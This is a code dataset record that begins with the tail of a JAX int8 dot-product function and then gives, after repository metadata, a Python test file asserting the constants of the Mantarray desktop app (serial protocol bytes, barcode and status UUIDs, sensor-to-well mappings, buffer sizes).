use_int8_to_int32_dot: boolean. If true, inputs to lax.dot_general will be
cast to int8 and results accumulated to int32, then converted back to
the original input type.
Returns:
Same as lax.dot_general.
"""
# We define two versions of a dot operation. The first feeds lax.dot_general
# the original inputs, which are typically bfloat16 or float32. The second
# converts the inputs to int8 tensors and accumulates results to an int32
# output.
def dot_general_fp(ops):
lhs_, rhs_ = ops
return lax.dot_general(
lhs_,
rhs_,
dimension_numbers=dimension_numbers,
precision=dot_precision)
def dot_general_int(ops):
lhs_, rhs_ = ops
input_dtype = lhs_.dtype
lhs_int = lhs_.astype(jnp.int8)
rhs_int = rhs_.astype(jnp.int8)
return lax.dot_general(
lhs_int,
rhs_int,
dimension_numbers=dimension_numbers,
precision=dot_precision,
preferred_element_type=jnp.int32).astype(input_dtype)
return lax.cond(use_int8_to_int32_dot, dot_general_int, dot_general_fp,
(lhs, rhs))
@dot_general_aqt.defjvp
def _dot_general_aqt_jvp(dimension_numbers, dot_precision,
use_int8_to_int32_dot, primals, tangents):
"""Custom gradient for dot_general_aqt that ignores integer casts."""
lhs, rhs = primals
lhs_dot, rhs_dot = tangents
y = dot_general_aqt(
lhs,
rhs,
dimension_numbers=dimension_numbers,
dot_precision=dot_precision,
use_int8_to_int32_dot=use_int8_to_int32_dot)
def differentiable_dot_general(lhs_, rhs_):
return lax.dot_general(
lhs_,
rhs_,
dimension_numbers=dimension_numbers,
precision=dot_precision)
_, y_tangent = jax.jvp(differentiable_dot_general, (lhs, rhs),
(lhs_dot, rhs_dot))
return y, y_tangent
| 41.234609
| 105
| 0.706138
|
41225b738d5791377123f0fb2ec7b6aca1ef062d
| 24,806
|
py
|
Python
|
tests/test_constants.py
|
CuriBio/mantarray-desktop-app
|
e00ace0e8c04eca3ae79826c59a878b59e15f6ff
|
[
"MIT"
] | null | null | null |
tests/test_constants.py
|
CuriBio/mantarray-desktop-app
|
e00ace0e8c04eca3ae79826c59a878b59e15f6ff
|
[
"MIT"
] | 253
|
2020-10-16T18:29:15.000Z
|
2022-03-31T21:27:56.000Z
|
tests/test_constants.py
|
CuriBio/mantarray-desktop-app
|
e00ace0e8c04eca3ae79826c59a878b59e15f6ff
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import datetime
from enum import IntEnum
import uuid
from mantarray_desktop_app import ADC_CH_TO_24_WELL_INDEX
from mantarray_desktop_app import ADC_CH_TO_IS_REF_SENSOR
from mantarray_desktop_app import ADC_GAIN
from mantarray_desktop_app import ADC_GAIN_DESCRIPTION_TAG
from mantarray_desktop_app import ADC_OFFSET_DESCRIPTION_TAG
from mantarray_desktop_app import BARCODE_CONFIRM_CLEAR_WAIT_SECONDS
from mantarray_desktop_app import BARCODE_GET_SCAN_WAIT_SECONDS
from mantarray_desktop_app import BARCODE_INVALID_UUID
from mantarray_desktop_app import BARCODE_POLL_PERIOD
from mantarray_desktop_app import BARCODE_SCANNER_BOTTOM_WIRE_OUT_ADDRESS
from mantarray_desktop_app import BARCODE_SCANNER_MID_WIRE_OUT_ADDRESS
from mantarray_desktop_app import BARCODE_SCANNER_TOP_WIRE_OUT_ADDRESS
from mantarray_desktop_app import BARCODE_SCANNER_TRIGGER_IN_ADDRESS
from mantarray_desktop_app import BARCODE_UNREADABLE_UUID
from mantarray_desktop_app import BARCODE_VALID_UUID
from mantarray_desktop_app import BUFFERING_STATE
from mantarray_desktop_app import CALIBRATED_STATE
from mantarray_desktop_app import CALIBRATING_STATE
from mantarray_desktop_app import CALIBRATION_NEEDED_STATE
from mantarray_desktop_app import CHANNEL_INDEX_TO_24_WELL_INDEX
from mantarray_desktop_app import CLEAR_BARCODE_TRIG_BIT
from mantarray_desktop_app import CLEARED_BARCODE_VALUE
from mantarray_desktop_app import COMPILED_EXE_BUILD_TIMESTAMP
from mantarray_desktop_app import CONSTRUCT_SENSOR_SAMPLING_PERIOD
from mantarray_desktop_app import CONSTRUCT_SENSORS_PER_REF_SENSOR
from mantarray_desktop_app import CURI_BIO_ACCOUNT_UUID
from mantarray_desktop_app import CURI_BIO_USER_ACCOUNT_ID
from mantarray_desktop_app import CURRENT_BETA1_HDF5_FILE_FORMAT_VERSION
from mantarray_desktop_app import CURRENT_BETA2_HDF5_FILE_FORMAT_VERSION
from mantarray_desktop_app import CURRENT_SOFTWARE_VERSION
from mantarray_desktop_app import DATA_ANALYZER_BETA_1_BUFFER_SIZE
from mantarray_desktop_app import DATA_ANALYZER_BUFFER_SIZE_CENTIMILLISECONDS
from mantarray_desktop_app import DATA_FRAME_PERIOD
from mantarray_desktop_app import DEFAULT_MAGNETOMETER_CONFIG
from mantarray_desktop_app import DEFAULT_SAMPLING_PERIOD
from mantarray_desktop_app import DEFAULT_SERVER_PORT_NUMBER
from mantarray_desktop_app import DEFAULT_USER_CONFIG
from mantarray_desktop_app import FIFO_READ_PRODUCER_DATA_OFFSET
from mantarray_desktop_app import FIFO_READ_PRODUCER_REF_AMPLITUDE
from mantarray_desktop_app import FIFO_READ_PRODUCER_SAWTOOTH_PERIOD
from mantarray_desktop_app import FIFO_READ_PRODUCER_WELL_AMPLITUDE
from mantarray_desktop_app import FIFO_SIMULATOR_DEFAULT_WIRE_OUT_VALUE
from mantarray_desktop_app import FILE_WRITER_BUFFER_SIZE_CENTIMILLISECONDS
from mantarray_desktop_app import FILE_WRITER_PERFOMANCE_LOGGING_NUM_CYCLES
from mantarray_desktop_app import FIRMWARE_VERSION_WIRE_OUT_ADDRESS
from mantarray_desktop_app import INSTRUMENT_COMM_PERFOMANCE_LOGGING_NUM_CYCLES
from mantarray_desktop_app import INSTRUMENT_INITIALIZING_STATE
from mantarray_desktop_app import LIVE_VIEW_ACTIVE_STATE
from mantarray_desktop_app import MAX_MC_REBOOT_DURATION_SECONDS
from mantarray_desktop_app import MAX_POSSIBLE_CONNECTED_BOARDS
from mantarray_desktop_app import MICROSECONDS_PER_CENTIMILLISECOND
from mantarray_desktop_app import MICROSECONDS_PER_MILLISECOND
from mantarray_desktop_app import MIDSCALE_CODE
from mantarray_desktop_app import MILLIVOLTS_PER_VOLT
from mantarray_desktop_app import MIN_NUM_SECONDS_NEEDED_FOR_ANALYSIS
from mantarray_desktop_app import NANOSECONDS_PER_CENTIMILLISECOND
from mantarray_desktop_app import NO_PLATE_DETECTED_BARCODE_VALUE
from mantarray_desktop_app import NO_PLATE_DETECTED_UUID
from mantarray_desktop_app import OUTGOING_DATA_BUFFER_SIZE
from mantarray_desktop_app import RAW_TO_SIGNED_CONVERSION_VALUE
from mantarray_desktop_app import RECORDING_STATE
from mantarray_desktop_app import REF_INDEX_TO_24_WELL_INDEX
from mantarray_desktop_app import REFERENCE_SENSOR_SAMPLING_PERIOD
from mantarray_desktop_app import REFERENCE_VOLTAGE
from mantarray_desktop_app import ROUND_ROBIN_PERIOD
from mantarray_desktop_app import SECONDS_TO_WAIT_WHEN_POLLING_QUEUES
from mantarray_desktop_app import SERIAL_COMM_ADDITIONAL_BYTES_INDEX
from mantarray_desktop_app import SERIAL_COMM_BAUD_RATE
from mantarray_desktop_app import SERIAL_COMM_BOOT_UP_CODE
from mantarray_desktop_app import SERIAL_COMM_CHECKSUM_FAILURE_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_CHECKSUM_LENGTH_BYTES
from mantarray_desktop_app import SERIAL_COMM_COMMAND_FAILURE_BYTE
from mantarray_desktop_app import SERIAL_COMM_COMMAND_RESPONSE_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_COMMAND_SUCCESS_BYTE
from mantarray_desktop_app import SERIAL_COMM_DEFAULT_DATA_CHANNEL
from mantarray_desktop_app import SERIAL_COMM_DUMP_EEPROM_COMMAND_BYTE
from mantarray_desktop_app import SERIAL_COMM_FATAL_ERROR_CODE
from mantarray_desktop_app import SERIAL_COMM_GET_METADATA_COMMAND_BYTE
from mantarray_desktop_app import SERIAL_COMM_HANDSHAKE_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_HANDSHAKE_PERIOD_SECONDS
from mantarray_desktop_app import SERIAL_COMM_HANDSHAKE_TIMEOUT_CODE
from mantarray_desktop_app import SERIAL_COMM_HANDSHAKE_TIMEOUT_SECONDS
from mantarray_desktop_app import SERIAL_COMM_IDLE_READY_CODE
from mantarray_desktop_app import SERIAL_COMM_MAGIC_WORD_BYTES
from mantarray_desktop_app import SERIAL_COMM_MAGIC_WORD_LENGTH_BYTES_CY
from mantarray_desktop_app import SERIAL_COMM_MAGNETOMETER_CONFIG_COMMAND_BYTE
from mantarray_desktop_app import SERIAL_COMM_MAGNETOMETER_DATA_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_MAIN_MODULE_ID
from mantarray_desktop_app import SERIAL_COMM_MAX_DATA_LENGTH_BYTES
from mantarray_desktop_app import SERIAL_COMM_MAX_PACKET_LENGTH_BYTES
from mantarray_desktop_app import SERIAL_COMM_MAX_TIMESTAMP_VALUE
from mantarray_desktop_app import SERIAL_COMM_METADATA_BYTES_LENGTH
from mantarray_desktop_app import SERIAL_COMM_MIN_FULL_PACKET_LENGTH_BYTES
from mantarray_desktop_app import SERIAL_COMM_MIN_PACKET_BODY_SIZE_BYTES
from mantarray_desktop_app import SERIAL_COMM_MODULE_ID_INDEX
from mantarray_desktop_app import SERIAL_COMM_MODULE_ID_TO_WELL_IDX
from mantarray_desktop_app import SERIAL_COMM_NUM_ALLOWED_MISSED_HANDSHAKES
from mantarray_desktop_app import SERIAL_COMM_NUM_CHANNELS_PER_SENSOR
from mantarray_desktop_app import SERIAL_COMM_NUM_CHANNELS_PER_SENSOR_CY
from mantarray_desktop_app import SERIAL_COMM_NUM_DATA_CHANNELS
from mantarray_desktop_app import SERIAL_COMM_NUM_SENSORS_PER_WELL
from mantarray_desktop_app import SERIAL_COMM_PACKET_INFO_LENGTH_BYTES
from mantarray_desktop_app import SERIAL_COMM_PACKET_TYPE_INDEX
from mantarray_desktop_app import SERIAL_COMM_PLATE_EVENT_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_REBOOT_COMMAND_BYTE
from mantarray_desktop_app import SERIAL_COMM_REGISTRATION_TIMEOUT_SECONDS
from mantarray_desktop_app import SERIAL_COMM_RESPONSE_TIMEOUT_SECONDS
from mantarray_desktop_app import SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE
from mantarray_desktop_app import SERIAL_COMM_SET_NICKNAME_COMMAND_BYTE
from mantarray_desktop_app import SERIAL_COMM_SET_STIM_PROTOCOL_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_SET_TIME_COMMAND_BYTE
from mantarray_desktop_app import SERIAL_COMM_SIMPLE_COMMAND_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_SOFT_ERROR_CODE
from mantarray_desktop_app import SERIAL_COMM_START_DATA_STREAMING_COMMAND_BYTE
from mantarray_desktop_app import SERIAL_COMM_START_STIM_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_STATUS_BEACON_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_STATUS_BEACON_PERIOD_SECONDS
from mantarray_desktop_app import SERIAL_COMM_STATUS_BEACON_TIMEOUT_SECONDS
from mantarray_desktop_app import SERIAL_COMM_STATUS_CODE_LENGTH_BYTES
from mantarray_desktop_app import SERIAL_COMM_STIM_STATUS_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_STOP_DATA_STREAMING_COMMAND_BYTE
from mantarray_desktop_app import SERIAL_COMM_STOP_STIM_PACKET_TYPE
from mantarray_desktop_app import SERIAL_COMM_TIME_INDEX_LENGTH_BYTES
from mantarray_desktop_app import SERIAL_COMM_TIME_OFFSET_LENGTH_BYTES
from mantarray_desktop_app import SERIAL_COMM_TIME_SYNC_READY_CODE
from mantarray_desktop_app import SERIAL_COMM_TIMESTAMP_BYTES_INDEX
from mantarray_desktop_app import SERIAL_COMM_TIMESTAMP_EPOCH
from mantarray_desktop_app import SERIAL_COMM_TIMESTAMP_LENGTH_BYTES
from mantarray_desktop_app import SERIAL_COMM_WELL_IDX_TO_MODULE_ID
from mantarray_desktop_app import SERVER_INITIALIZING_STATE
from mantarray_desktop_app import SERVER_READY_STATE
from mantarray_desktop_app import START_BARCODE_SCAN_TRIG_BIT
from mantarray_desktop_app import START_MANAGED_ACQUISITION_COMMUNICATION
from mantarray_desktop_app import STIM_COMPLETE_SUBPROTOCOL_IDX
from mantarray_desktop_app import STIM_MAX_ABSOLUTE_CURRENT_MICROAMPS
from mantarray_desktop_app import STIM_MAX_ABSOLUTE_VOLTAGE_MILLIVOLTS
from mantarray_desktop_app import STIM_MAX_PULSE_DURATION_MICROSECONDS
from mantarray_desktop_app import STIM_NO_PROTOCOL_ASSIGNED
from mantarray_desktop_app import StimStatuses
from mantarray_desktop_app import STM_VID
from mantarray_desktop_app import STOP_MANAGED_ACQUISITION_COMMUNICATION
from mantarray_desktop_app import SUBPROCESS_POLL_DELAY_SECONDS
from mantarray_desktop_app import SUBPROCESS_SHUTDOWN_TIMEOUT_SECONDS
from mantarray_desktop_app import SYSTEM_STATUS_UUIDS
from mantarray_desktop_app import TIMESTEP_CONVERSION_FACTOR
from mantarray_desktop_app import VALID_CONFIG_SETTINGS
from mantarray_desktop_app import VALID_SCRIPTING_COMMANDS
from mantarray_desktop_app import WELL_24_INDEX_TO_ADC_AND_CH_INDEX
import mantarray_file_manager.constants
import numpy as np
from xem_wrapper import DATA_FRAMES_PER_ROUND_ROBIN
def test_default_server_port_number():
assert DEFAULT_SERVER_PORT_NUMBER == 4567
def test_max_boards():
assert MAX_POSSIBLE_CONNECTED_BOARDS == 4
def test_firmware_addresses():
assert FIRMWARE_VERSION_WIRE_OUT_ADDRESS == 0x21
assert BARCODE_SCANNER_TRIGGER_IN_ADDRESS == 0x41
assert BARCODE_SCANNER_TOP_WIRE_OUT_ADDRESS == 0x2A
assert BARCODE_SCANNER_MID_WIRE_OUT_ADDRESS == 0x2B
assert BARCODE_SCANNER_BOTTOM_WIRE_OUT_ADDRESS == 0x2C
def test_barcode_constants():
assert CLEAR_BARCODE_TRIG_BIT == 0x5
assert START_BARCODE_SCAN_TRIG_BIT == 0x6
assert BARCODE_POLL_PERIOD == 15
assert BARCODE_CONFIRM_CLEAR_WAIT_SECONDS == 0.5
assert BARCODE_GET_SCAN_WAIT_SECONDS == 6
assert CLEARED_BARCODE_VALUE == chr(0) * 12
assert NO_PLATE_DETECTED_BARCODE_VALUE == chr(21) * 12
def test_barcode_UUIDs():
assert BARCODE_VALID_UUID == uuid.UUID("22d5054a-ede2-4e94-8f74-f4ebaafde247")
assert BARCODE_INVALID_UUID == uuid.UUID("cec87db3-3181-4b84-8d5e-1643cd00b567")
assert NO_PLATE_DETECTED_UUID == uuid.UUID("e86ca1d0-2350-4e1b-ad6a-5c78a6c2ed7a")
assert BARCODE_UNREADABLE_UUID == uuid.UUID("87525976-4c98-4783-a6f2-ae34a89dace6")
def test_default_UUIDs():
assert CURI_BIO_ACCOUNT_UUID == uuid.UUID("73f52be0-368c-42d8-a1fd-660d49ba5604")
assert CURI_BIO_USER_ACCOUNT_ID == uuid.UUID("455b93eb-c78f-4494-9f73-d3291130f126")
def test_running_fifo_simulator_constants():
assert FIFO_READ_PRODUCER_SAWTOOTH_PERIOD == ((100000 // TIMESTEP_CONVERSION_FACTOR) / (2 * np.pi))
assert FIFO_SIMULATOR_DEFAULT_WIRE_OUT_VALUE == 0xFFFFFFFF
assert RAW_TO_SIGNED_CONVERSION_VALUE == 2 ** 23
assert (
FIFO_READ_PRODUCER_DATA_OFFSET == MIDSCALE_CODE + 0xB000 + FIFO_READ_PRODUCER_WELL_AMPLITUDE * 24 // 2
)
assert FIFO_READ_PRODUCER_WELL_AMPLITUDE == 0x1014
assert FIFO_READ_PRODUCER_REF_AMPLITUDE == 0x100
def test_hardware_time_constants():
assert DATA_FRAME_PERIOD == 20
assert ROUND_ROBIN_PERIOD == DATA_FRAME_PERIOD * DATA_FRAMES_PER_ROUND_ROBIN
assert REFERENCE_SENSOR_SAMPLING_PERIOD == ROUND_ROBIN_PERIOD // 4
assert CONSTRUCT_SENSOR_SAMPLING_PERIOD == ROUND_ROBIN_PERIOD
assert TIMESTEP_CONVERSION_FACTOR == 5
assert MICROSECONDS_PER_CENTIMILLISECOND == 10
assert NANOSECONDS_PER_CENTIMILLISECOND == 10 ** 4
assert MICROSECONDS_PER_MILLISECOND == 10 ** 3
def test_adc_reading_constants():
assert REFERENCE_VOLTAGE == 2.5
assert MIDSCALE_CODE == 0x800000
assert ADC_GAIN == 2
assert MILLIVOLTS_PER_VOLT == 1000
def test_sensors_and_mappings():
assert CONSTRUCT_SENSORS_PER_REF_SENSOR == 4
assert CHANNEL_INDEX_TO_24_WELL_INDEX == {
0: 0,
1: 1,
2: 4,
3: 5,
4: 8,
5: 9,
6: 12,
7: 13,
8: 16,
9: 17,
10: 20,
11: 21,
12: 7,
13: 6,
14: 3,
15: 2,
16: 15,
17: 14,
18: 11,
19: 10,
20: 23,
21: 22,
22: 19,
23: 18,
}
assert REF_INDEX_TO_24_WELL_INDEX == {
0: frozenset([0, 1, 4, 5]),
1: frozenset([8, 9, 12, 13]),
2: frozenset([16, 17, 20, 21]),
3: frozenset([2, 3, 6, 7]),
4: frozenset([10, 11, 14, 15]),
5: frozenset([18, 19, 22, 23]),
}
assert ADC_CH_TO_24_WELL_INDEX == {
0: {0: 0, 2: 1, 4: 4, 6: 5},
1: {0: 8, 2: 9, 4: 12, 6: 13},
2: {0: 16, 2: 17, 4: 20, 6: 21},
3: {6: 2, 4: 3, 2: 6, 0: 7},
4: {6: 10, 4: 11, 2: 14, 0: 15},
5: {6: 18, 4: 19, 2: 22, 0: 23},
}
assert ADC_CH_TO_IS_REF_SENSOR == {
0: {0: False, 1: True, 2: False, 3: True, 4: False, 5: True, 6: False, 7: True},
1: {0: False, 1: True, 2: False, 3: True, 4: False, 5: True, 6: False, 7: True},
2: {0: False, 1: True, 2: False, 3: True, 4: False, 5: True, 6: False, 7: True},
3: {0: False, 1: True, 2: False, 3: True, 4: False, 5: True, 6: False, 7: True},
4: {0: False, 1: True, 2: False, 3: True, 4: False, 5: True, 6: False, 7: True},
5: {0: False, 1: True, 2: False, 3: True, 4: False, 5: True, 6: False, 7: True},
}
for well_idx in range(24):
adc_num, ch_num = WELL_24_INDEX_TO_ADC_AND_CH_INDEX[well_idx]
assert ADC_CH_TO_24_WELL_INDEX[adc_num][ch_num] == well_idx
def test_current_file_versions():
latest_beta1_hdf5_file_format_version = (
mantarray_file_manager.constants.CURRENT_BETA1_HDF5_FILE_FORMAT_VERSION
)
assert (
CURRENT_BETA1_HDF5_FILE_FORMAT_VERSION == latest_beta1_hdf5_file_format_version
), "FileWriterProcess needs an update to match the beta 1 file format with the latest file version from mantarray-file-manager. Make the changes then update CURRENT_BETA1_HDF5_FILE_FORMAT_VERSION to match the latest version"
latest_beta2_hdf5_file_format_version = (
mantarray_file_manager.constants.CURRENT_BETA2_HDF5_FILE_FORMAT_VERSION
)
assert (
CURRENT_BETA2_HDF5_FILE_FORMAT_VERSION == latest_beta2_hdf5_file_format_version
), "FileWriterProcess needs an update to match the beta 2 file format with the latest file version from mantarray-file-manager. Make the changes then update CURRENT_BETA2_HDF5_FILE_FORMAT_VERSION to match the latest version"
def test_COMPILED_EXE_BUILD_TIMESTAMP():
assert COMPILED_EXE_BUILD_TIMESTAMP == "REPLACETHISWITHTIMESTAMPDURINGBUILD"
def test_CURRENT_SOFTWARE_VERSION():
assert CURRENT_SOFTWARE_VERSION == "REPLACETHISWITHVERSIONDURINGBUILD"
def test_managed_acquisition_commands():
assert START_MANAGED_ACQUISITION_COMMUNICATION == {
"communication_type": "acquisition_manager",
"command": "start_managed_acquisition",
}
assert STOP_MANAGED_ACQUISITION_COMMUNICATION == {
"communication_type": "acquisition_manager",
"command": "stop_managed_acquisition",
}
def test_scripting():
assert VALID_SCRIPTING_COMMANDS == frozenset(
[
"begin_hardware_script",
"end_hardware_script",
"set_wire_in",
"read_wire_out",
"activate_trigger_in",
"comm_delay",
"start_calibration",
]
)
assert ADC_GAIN_DESCRIPTION_TAG == "adc_gain_setting"
assert ADC_OFFSET_DESCRIPTION_TAG == "adc_offset_reading"
def test_buffer_size_constants():
assert MIN_NUM_SECONDS_NEEDED_FOR_ANALYSIS == 7
assert DATA_ANALYZER_BUFFER_SIZE_CENTIMILLISECONDS == 700000
assert FILE_WRITER_BUFFER_SIZE_CENTIMILLISECONDS == 3000000
assert OUTGOING_DATA_BUFFER_SIZE == 2
assert (
DATA_ANALYZER_BETA_1_BUFFER_SIZE == DATA_ANALYZER_BUFFER_SIZE_CENTIMILLISECONDS // ROUND_ROBIN_PERIOD
)
def test_performance_logging_constants():
assert INSTRUMENT_COMM_PERFOMANCE_LOGGING_NUM_CYCLES == 20
assert FILE_WRITER_PERFOMANCE_LOGGING_NUM_CYCLES == 2000
def test_system_status_uuids():
assert SERVER_INITIALIZING_STATE == "server_initializing"
assert SERVER_READY_STATE == "server_ready"
assert INSTRUMENT_INITIALIZING_STATE == "instrument_initializing"
assert CALIBRATION_NEEDED_STATE == "calibration_needed"
assert CALIBRATING_STATE == "calibrating"
assert CALIBRATED_STATE == "calibrated"
assert BUFFERING_STATE == "buffering"
assert LIVE_VIEW_ACTIVE_STATE == "live_view_active"
assert RECORDING_STATE == "recording"
assert SYSTEM_STATUS_UUIDS == {
SERVER_INITIALIZING_STATE: uuid.UUID("04471bcf-1a00-4a0d-83c8-4160622f9a25"),
SERVER_READY_STATE: uuid.UUID("8e24ef4d-2353-4e9d-aa32-4346126e73e3"),
INSTRUMENT_INITIALIZING_STATE: uuid.UUID("d2e3d386-b760-4c9a-8b2d-410362ff11c4"),
CALIBRATION_NEEDED_STATE: uuid.UUID("009301eb-625c-4dc4-9e92-1a4d0762465f"),
CALIBRATING_STATE: uuid.UUID("43c08fc5-ca2f-4dcd-9dff-5e9324cb5dbf"),
CALIBRATED_STATE: uuid.UUID("b480373b-9466-4fa0-92a6-fa5f8e340d30"),
BUFFERING_STATE: uuid.UUID("dc774d4b-6bd1-4717-b36e-6df6f1ef6cf4"),
LIVE_VIEW_ACTIVE_STATE: uuid.UUID("9fbee58e-c6af-49a5-b2e2-5b085eead2ea"),
RECORDING_STATE: uuid.UUID("1e3d76a2-508d-4c99-8bf5-60dac5cc51fe"),
}
def test_user_config():
assert DEFAULT_USER_CONFIG == {
"Customer Account ID": "",
"User Account ID": "",
}
assert VALID_CONFIG_SETTINGS == frozenset(
["customer_account_uuid", "user_account_uuid", "recording_directory"]
)
def test_shutdown_values():
assert SUBPROCESS_SHUTDOWN_TIMEOUT_SECONDS == 1
assert SUBPROCESS_POLL_DELAY_SECONDS == 0.025
def test_parallelism_config():
assert SECONDS_TO_WAIT_WHEN_POLLING_QUEUES == 0.02
def test_serial_comm():
assert STM_VID == 1155
assert SERIAL_COMM_BAUD_RATE == int(5e6)
assert MAX_MC_REBOOT_DURATION_SECONDS == 5
assert SERIAL_COMM_NUM_ALLOWED_MISSED_HANDSHAKES == 3
assert SERIAL_COMM_TIMESTAMP_EPOCH == datetime.datetime(
year=2021, month=1, day=1, tzinfo=datetime.timezone.utc
)
assert SERIAL_COMM_STATUS_BEACON_PERIOD_SECONDS == 5
assert SERIAL_COMM_HANDSHAKE_PERIOD_SECONDS == 5
assert SERIAL_COMM_RESPONSE_TIMEOUT_SECONDS == 5
assert SERIAL_COMM_HANDSHAKE_TIMEOUT_SECONDS == 6
assert SERIAL_COMM_STATUS_BEACON_TIMEOUT_SECONDS == 7
assert SERIAL_COMM_REGISTRATION_TIMEOUT_SECONDS == 8
assert SERIAL_COMM_MAGIC_WORD_BYTES == b"CURI BIO"
assert SERIAL_COMM_PACKET_INFO_LENGTH_BYTES == 2
assert SERIAL_COMM_TIMESTAMP_LENGTH_BYTES == 8
assert SERIAL_COMM_TIME_INDEX_LENGTH_BYTES == 8
assert SERIAL_COMM_TIME_OFFSET_LENGTH_BYTES == 2
assert SERIAL_COMM_CHECKSUM_LENGTH_BYTES == 4
assert SERIAL_COMM_STATUS_CODE_LENGTH_BYTES == 4
assert SERIAL_COMM_MAX_PACKET_LENGTH_BYTES == 2 ** 16
assert SERIAL_COMM_MAX_DATA_LENGTH_BYTES == (
SERIAL_COMM_MAX_PACKET_LENGTH_BYTES
- SERIAL_COMM_PACKET_INFO_LENGTH_BYTES
- SERIAL_COMM_TIMESTAMP_LENGTH_BYTES
- SERIAL_COMM_CHECKSUM_LENGTH_BYTES
- 10
)
assert SERIAL_COMM_MIN_PACKET_BODY_SIZE_BYTES == (
SERIAL_COMM_TIMESTAMP_LENGTH_BYTES
+ SERIAL_COMM_PACKET_INFO_LENGTH_BYTES
+ SERIAL_COMM_CHECKSUM_LENGTH_BYTES
)
assert (
SERIAL_COMM_MIN_FULL_PACKET_LENGTH_BYTES
== SERIAL_COMM_MIN_PACKET_BODY_SIZE_BYTES
+ SERIAL_COMM_PACKET_INFO_LENGTH_BYTES
+ len(SERIAL_COMM_MAGIC_WORD_BYTES)
)
assert SERIAL_COMM_MAX_TIMESTAMP_VALUE == 2 ** (8 * SERIAL_COMM_TIMESTAMP_LENGTH_BYTES) - 1
assert (
SERIAL_COMM_TIMESTAMP_BYTES_INDEX
== len(SERIAL_COMM_MAGIC_WORD_BYTES) + SERIAL_COMM_PACKET_INFO_LENGTH_BYTES
)
assert SERIAL_COMM_MODULE_ID_INDEX == 18
assert SERIAL_COMM_PACKET_TYPE_INDEX == 19
assert SERIAL_COMM_ADDITIONAL_BYTES_INDEX == 20
assert SERIAL_COMM_MAIN_MODULE_ID == 0
assert SERIAL_COMM_STATUS_BEACON_PACKET_TYPE == 0
assert SERIAL_COMM_MAGNETOMETER_DATA_PACKET_TYPE == 1
assert SERIAL_COMM_SIMPLE_COMMAND_PACKET_TYPE == 3
assert SERIAL_COMM_COMMAND_RESPONSE_PACKET_TYPE == 4
assert SERIAL_COMM_HANDSHAKE_PACKET_TYPE == 4
assert SERIAL_COMM_PLATE_EVENT_PACKET_TYPE == 6
assert SERIAL_COMM_STIM_STATUS_PACKET_TYPE == 7
assert SERIAL_COMM_SET_STIM_PROTOCOL_PACKET_TYPE == 20
assert SERIAL_COMM_START_STIM_PACKET_TYPE == 21
assert SERIAL_COMM_STOP_STIM_PACKET_TYPE == 22
assert SERIAL_COMM_CHECKSUM_FAILURE_PACKET_TYPE == 255
assert SERIAL_COMM_REBOOT_COMMAND_BYTE == 0
assert SERIAL_COMM_MAGNETOMETER_CONFIG_COMMAND_BYTE == 1
assert SERIAL_COMM_START_DATA_STREAMING_COMMAND_BYTE == 2
assert SERIAL_COMM_STOP_DATA_STREAMING_COMMAND_BYTE == 3
assert SERIAL_COMM_GET_METADATA_COMMAND_BYTE == 6
assert SERIAL_COMM_DUMP_EEPROM_COMMAND_BYTE == 7
assert SERIAL_COMM_SET_TIME_COMMAND_BYTE == 8
assert SERIAL_COMM_SET_NICKNAME_COMMAND_BYTE == 9
assert SERIAL_COMM_COMMAND_SUCCESS_BYTE == 0
assert SERIAL_COMM_COMMAND_FAILURE_BYTE == 1
assert SERIAL_COMM_METADATA_BYTES_LENGTH == 32
assert SERIAL_COMM_IDLE_READY_CODE == 0
assert SERIAL_COMM_TIME_SYNC_READY_CODE == 1
assert SERIAL_COMM_HANDSHAKE_TIMEOUT_CODE == 2
assert SERIAL_COMM_BOOT_UP_CODE == 3
assert SERIAL_COMM_FATAL_ERROR_CODE == 4
assert SERIAL_COMM_SOFT_ERROR_CODE == 5
assert SERIAL_COMM_NUM_DATA_CHANNELS == 9
assert SERIAL_COMM_NUM_CHANNELS_PER_SENSOR == 3
assert SERIAL_COMM_NUM_SENSORS_PER_WELL == 3
assert (
SERIAL_COMM_NUM_DATA_CHANNELS
== SERIAL_COMM_NUM_CHANNELS_PER_SENSOR * SERIAL_COMM_NUM_SENSORS_PER_WELL
)
assert SERIAL_COMM_DEFAULT_DATA_CHANNEL == SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["A"]["X"]
assert DEFAULT_SAMPLING_PERIOD == 10000
for module_id in range(1, 25):
assert DEFAULT_MAGNETOMETER_CONFIG[module_id] == {
SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["A"]["X"]: True,
SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["A"]["Y"]: True,
SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["A"]["Z"]: True,
SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["B"]["X"]: True,
SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["B"]["Y"]: True,
SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["B"]["Z"]: True,
SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["C"]["X"]: True,
SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["C"]["Y"]: True,
SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["C"]["Z"]: True,
}
assert STIM_MAX_ABSOLUTE_CURRENT_MICROAMPS == int(100e3)
assert STIM_MAX_ABSOLUTE_VOLTAGE_MILLIVOLTS == int(1.2e3)
assert STIM_MAX_PULSE_DURATION_MICROSECONDS == int(50e3)
assert STIM_COMPLETE_SUBPROTOCOL_IDX == 255
assert STIM_NO_PROTOCOL_ASSIGNED == 255
assert issubclass(StimStatuses, IntEnum) is True
assert StimStatuses.ACTIVE == 0
assert StimStatuses.NULL == 1
assert StimStatuses.RESTARTING == 2
assert StimStatuses.FINISHED == 3
assert StimStatuses.ERROR == 4
def test_cython_constants():
assert SERIAL_COMM_MAGIC_WORD_LENGTH_BYTES_CY == len(SERIAL_COMM_MAGIC_WORD_BYTES)
